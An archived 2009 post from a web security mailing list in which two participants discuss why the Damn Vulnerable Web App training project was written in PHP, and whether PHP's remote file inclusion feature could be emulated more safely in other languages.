[prev in list] [next in list] [prev in thread] [next in thread]
List: websecurity
Subject: Re: [WEB SECURITY] Damn Vulnerable Web App
From: Stephan Wehner <stephanwehner () gmail ! com>
Date: 2009-05-31 19:28:00
Message-ID: e66d1efb0905311228s2b2d9cc6v48f5eec520036dd8 () mail ! gmail ! com
[Download RAW message or body]
2009/5/29 MustLive <mustlive@websecurity.com.ua>:
> Hello Stephan!
>
> Your wrote nice comment about Ryan's DVWA project and I'd made some comments
> on your one.
>
>> Any particular reason it is implemented in PHP ??
>
> I see two reasons why Ryan developed his project in PHP.
>
> 1. He have programming knowledge of PHP (so he decided to use it).
>
> 2. PHP language has a lot of built-in futures which are used by developers
> and make a lot of attack vectors. And for this reason PHP is liked by
> hackers (I mean php web apps with full of holes) and this is why php web
> apps are very widespread in bugtracks.
>
> The 2nd reason is even more important than 1st one :-). Especially for
> unique futures of PHP language which are liked by hackers, such as Remote
> File Inclusion. Only for this one there was a reason to make DVWA on PHP.
>
> Do you know any other programming language (which is used for web apps
> development) that has such ability (only server-side) - to include files
> remotely? Because I don't know any other such language (from all
> web-oriented programming languages which I know). Only PHP has such future
> and has RFI holes in web apps on this language ;-).
Well, I may be misunderstanding, but could such a feature be emulated
in another language? That way these kinds of holes may be controlled,
with a predictable interface and all in all more secure :-)
Stephan
--
Stephan Wehner
-> http://stephan.sugarmotor.org (blog and homepage)
-> http://www.thrackle.org
-> http://www.buckmaster.ca
-> http://www.trafficlife.com
-> http://stephansmap.org -- http://blog.stephansmap.org
----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic